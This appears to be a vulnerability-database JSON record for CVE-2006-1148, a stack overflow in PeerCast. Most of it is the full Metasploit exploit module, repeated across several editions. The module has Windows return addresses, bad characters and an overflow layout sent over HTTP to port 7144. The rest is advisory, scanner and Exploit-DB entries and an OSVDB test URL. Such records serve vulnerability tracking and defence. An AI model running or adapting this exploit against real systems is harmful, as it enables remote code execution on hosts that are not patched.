"https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-01-14T22:10:23", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-01-15T14:15:19", "history": [], "viewCount": 1, "enchantments": {"score": {"value": null, "modified": "2018-01-15T14:15:19"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-01-15T14:15:19", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-01-16T10:14:26", "history": [], "viewCount": 1, "enchantments": {"score": {"value": null, "modified": "2018-01-16T10:14:26"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-01-16T10:14:26", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-01-17T00:12:08", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "modified": "2018-01-17T00:12:08"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-01-17T00:12:08", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-02-22T01:07:08", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "modified": "2018-02-22T01:07:08"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-02-22T01:07:08", "differentElements": ["modified", "published"], "edition": 14}], "viewCount": 1, "enchantments": {"vulnersScore": 5.5}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"]}

{"result": {"cve": [{"id": "CVE-2006-1148", "type": "cve", "title": "CVE-2006-1148", "description": "Multiple stack-based buffer overflows in the procConnectArgs function in servmgr.cpp in PeerCast before 0.1217 allow remote attackers to execute arbitrary code via an HTTP GET request with a long (1) parameter name or (2) value in a URL, which triggers the overflow in the nextCGIarg function in servhs.cpp.", "published": "2006-03-10T06:02:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1148", "cvelist": ["CVE-2006-1148"], "lastseen": "2017-07-20T10:49:09"}], "metasploit": [{"id": "MSF:EXPLOIT/LINUX/HTTP/PEERCAST_URL", "type": "metasploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "cvelist": ["CVE-2006-1148"], "lastseen": "2018-02-25T03:05:37"}], "openvas": [{"id": "OPENVAS:56545", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200603-17 (peercast)", "description": "The remote host is missing updates announced in\nadvisory GLSA 200603-17.", "published": "2008-09-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=56545", "cvelist": ["CVE-2006-1148"], "lastseen": "2017-07-24T12:50:17"}], "exploitdb": [{"id": "EDB-ID:16786", "type": "exploitdb", "title": "PeerCast <= 0.1216 URL Handling Buffer Overflow Win32", "description": "PeerCast. CVE-2006-1148. Remote exploit for windows platform", "published": "2010-09-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/16786/", "cvelist": ["CVE-2006-1148"], "lastseen": "2016-02-02T06:30:19"}, {"id": "EDB-ID:10027", "type": "exploitdb", "title": "PeerCast <= 0.1216", "description": "PeerCast. CVE-2006-1148. Remote exploit for linux platform", "published": "2006-03-08T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/10027/", "cvelist": ["CVE-2006-1148"], "lastseen": "2016-02-01T11:45:48"}, {"id": "EDB-ID:16855", "type": "exploitdb", "title": "PeerCast <= 0.1216 URL Handling Buffer Overflow linux", "description": "PeerCast. CVE-2006-1148. Remote exploit for linux platform", "published": "2010-09-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/16855/", "cvelist": ["CVE-2006-1148"], "lastseen": "2016-02-02T06:40:34"}], "nessus": [{"id": "GENTOO_GLSA-200603-17.NASL", "type": "nessus", "title": "GLSA-200603-17 : PeerCast: Buffer overflow", "description": "The remote host is affected by the vulnerability described in GLSA-200603-17 (PeerCast: Buffer overflow)\n\n INFIGO discovered a problem in the URL handling code. Buffers that are allocated on the stack can be overflowed inside of nextCGIarg() function.\n Impact :\n\n By sending a specially crafted request to the HTTP server, a remote attacker can cause a stack overflow, resulting in the execution of arbitrary code.\n Workaround :\n\n There is no known workaround at this time.", "published": "2006-03-23T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=21124", "cvelist": ["CVE-2006-1148"], "lastseen": "2017-10-29T13:35:50"}, {"id": "PEERCAST_01217.NASL", "type": "nessus", "title": "PeerCast procConnectArgs() Function URL Handling Remote Overflow", "description": "The version of PeerCast installed on the remote host copies the supplied option string without limit into a finite-size buffer. An unauthenticated attacker can leverage this issue to crash the affected application and possibly to execute arbitrary code on the remote host subject to the privileges of the user running PeerCast.", "published": "2006-03-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=21041", "cvelist": ["CVE-2006-1148"], "lastseen": "2016-11-24T09:26:09"}], "osvdb": [{"id": "OSVDB:23777", "type": "osvdb", "title": "PeerCast procConnectArgs() Function URL Handling Remote Overflow", "description": "## Vulnerability Description\nA remote overflow exists in PeerCast. The procConnectArgs() function fails to perform correct boundary checks on parameters passed in a URL, resulting in a stack-based overflow. With a specially crafted URL, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 0.1217 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in PeerCast. The procConnectArgs() function fails to perform correct boundary checks on parameters passed in a URL, resulting in a stack-based overflow. With a specially crafted URL, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Manual Testing Notes\nhttp://[target]:7144/stream/?AAAAAAAAAAAAAAAAAAAAAAA....(800)\n## References:\nVendor URL: http://www.peercast.org/\n[Secunia Advisory ID:19169](https://secuniaresearch.flexerasoftware.com/advisories/19169/)\n[Secunia Advisory ID:19291](https://secuniaresearch.flexerasoftware.com/advisories/19291/)\nOther Advisory URL: http://www.peercast.org/forum/viewtopic.php?t=3346\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200603-17.xml\nOther Advisory URL: http://www.infigo.hr/in_focus/INFIGO-2006-03-01\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0977.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0722.html\nGeneric Exploit URL: http://prdelka.blackart.org.uk/exploitz/prdelka-vs-GNU-peercast.c\n[CVE-2006-1148](https://vulners.com/cve/CVE-2006-1148)\nBugtraq ID: 17040\n", "published": "2006-03-09T06:02:41", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:23777", "cvelist": ["CVE-2006-1148"], "lastseen": "2017-04-28T13:20:20"}], "gentoo": [{"id": "GLSA-200603-17", "type": "gentoo", "title": "PeerCast: Buffer overflow", "description": "### Background\n\nPeerCast is a Peer to Peer broadcasting technology for listening to radio and watching video on the Internet. \n\n### Description\n\nINFIGO discovered a problem in the URL handling code. Buffers that are allocated on the stack can be overflowed inside of nextCGIarg() function. \n\n### Impact\n\nBy sending a specially crafted request to the HTTP server, a remote attacker can cause a stack overflow, resulting in the execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll PeerCast users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-sound/peercast-0.1217\"", "published": "2006-03-21T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://security.gentoo.org/glsa/200603-17", "cvelist": ["CVE-2006-1148"], "lastseen": "2016-09-06T19:46:33"}], "packetstorm": [{"id": "PACKETSTORM:82238", "type": "packetstorm", "title": "PeerCast 0.1216 Buffer Overflow", "description": "", "published": "2009-10-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/82238/PeerCast-0.1216-Buffer-Overflow.html", "cvelist": ["CVE-2006-1148"], "lastseen": "2016-12-05T22:12:48"}]}}